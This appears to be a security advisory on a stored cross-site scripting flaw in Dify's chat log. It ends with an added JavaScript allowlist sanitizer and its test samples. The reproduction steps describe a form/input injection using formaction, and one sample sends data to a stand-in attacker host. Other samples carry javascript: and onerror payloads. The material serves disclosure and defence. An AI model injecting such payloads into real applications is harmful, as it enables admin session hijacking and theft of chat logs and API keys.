langgenius/dify
cpe:2.3:a:langgenius:dify:*:*:*:*:node.js:*:*
- latest
A stored cross-site scripting vulnerability has been identified in Langgenius Dify, specifically in the latest version. The issue arises in the chat log feature, where certain HTML tags, such as <input> and <form>, are not properly restricted. This oversight allows an attacker to inject malicious HTML into the chat log via prompts. When an admin reviews the log, the injected HTML can execute scripts that steal the admin's credentials or sensitive information. This vulnerability has been fixed in version 0.12.1.
Exploitation of this vulnerability allows an attacker to hijack an admin account in a published chatbot, potentially accessing other users' chat logs and API keys.
To reproduce this vulnerability, inject a <form> element containing an <input> of type 'image' into the chat log. The input should include a 'formaction' attribute that directs to a JavaScript alert or a request to an external server, such as one controlled by the attacker. Once the form is submitted, the injected image will appear in the chat log. When an admin clicks the image, the JavaScript payload will execute, demonstrating the cross-site scripting vulnerability.
Users can update to Dify version 0.12.1 or later, where this vulnerability has been fixed.
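The defensive side of the issue described above, as an added example that is not code from the Dify project: an allowlist-based sanitizer for chat-log content written in JavaScript, since the chat log is rendered in the admin's browser. Tag names not on the allowlist, including `<form>` and `<input>`, are escaped to literal text rather than stripped (stripping invites nested-fragment bypasses such as `<fo<form>rm>`), attributes are allowlisted per tag, `on*` handlers and `formaction` are never kept, and URL attributes must use a safe scheme. The allowlist, the `attacker.example` host and the sample messages are constructed for this example. A production front end should rely on a maintained sanitizer such as DOMPurify with form controls forbidden; this block shows the principle and the checks a reviewer would look for in the rendering path.

```javascript
// Allowlist-based HTML sanitizer for untrusted chat-log content (added example,
// not Dify's own code). Anything that is not an allowlisted tag is escaped so
// the admin's browser shows it as text instead of interpreting it.
"use strict";

// Per-tag attribute allowlist. Deliberately absent: form, input, button,
// script, iframe, style, svg, and any attribute that can carry a URL or
// handler outside this list (formaction, srcdoc, on*, ...).
const ALLOWED_TAGS = {
  p: [], br: [], b: [], i: [], em: [], strong: [], code: [], pre: [],
  ul: [], ol: [], li: [],
  a: ["href", "title"],
  img: ["src", "alt"],
};
const URL_ATTRS = new Set(["href", "src"]);
const SAFE_SCHEMES = new Set(["http", "https", "mailto"]);

function escapeHtml(s) {
  return s
    .replace(/&/g, "&amp;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;");
}

// True if the URL is relative or uses an allowlisted scheme. Control characters
// and whitespace are removed first because browsers ignore them while parsing a
// scheme, so "java\tscript:" must be treated as "javascript:".
function isSafeUrl(value) {
  const cleaned = value.replace(/[\u0000-\u0020\u007f]/g, "").toLowerCase();
  const m = /^([a-z][a-z0-9+.-]*):/.exec(cleaned);
  return m === null || SAFE_SCHEMES.has(m[1]);
}

// Rebuilds an allowlisted tag from scratch, keeping only allowlisted attributes.
function rebuildTag(name, rawAttrs, closing) {
  if (closing) return `</${name}>`;
  const allowed = ALLOWED_TAGS[name];
  const attrRe = /([^\s"'=<>\/]+)(?:\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s"'>]+)))?/g;
  const kept = [];
  let m;
  while ((m = attrRe.exec(rawAttrs)) !== null) {
    const attrName = m[1].toLowerCase();
    const value = m[2] ?? m[3] ?? m[4] ?? "";
    if (attrName.startsWith("on")) continue;   // event handlers are never kept
    if (!allowed.includes(attrName)) continue; // e.g. formaction, style, srcdoc
    if (URL_ATTRS.has(attrName) && !isSafeUrl(value)) continue;
    kept.push(`${attrName}="${escapeHtml(value)}"`);
  }
  return `<${name}${kept.length ? " " + kept.join(" ") : ""}>`;
}

// Sanitizes one chat message. Every "<" sequence is either rebuilt as an
// allowlisted tag or escaped; nothing unknown reaches the renderer.
function sanitizeChatHtml(html) {
  return html.replace(/<[^>]*>?/g, (chunk) => {
    const tag = /^<(\/?)([a-zA-Z][a-zA-Z0-9-]*)([^>]*)>$/.exec(chunk);
    if (tag === null) return escapeHtml(chunk);
    const name = tag[2].toLowerCase();
    // hasOwnProperty guards against names like "constructor" hitting the prototype
    if (!Object.prototype.hasOwnProperty.call(ALLOWED_TAGS, name)) return escapeHtml(chunk);
    return rebuildTag(name, tag[3], tag[1] === "/");
  });
}

// Constructed sample messages (not taken from the advisory) covering the tags
// the advisory names plus the other attribute-level checks above.
const SAMPLES = [
  '<form><input type="image" src="x.png" formaction="https://attacker.example/collect"></form>',
  '<a href="javascript:void(0)">link</a>',
  '<img src="pic.png" onerror="handler()" alt="cat">',
  '<b>normal</b> text with a<b>nested</b> <script>x()</script>',
];

for (const s of SAMPLES) console.log(sanitizeChatHtml(s));
```

The first sample shows the advisory's case: the whole `<form>`/`<input>` fragment comes back as escaped text, so there is no clickable image and no `formaction` for the browser to follow. The scheme check in `isSafeUrl` matters for the `<a>` and `<img>` tags that are allowed: without it a permitted `href` could still carry a non-HTTP scheme.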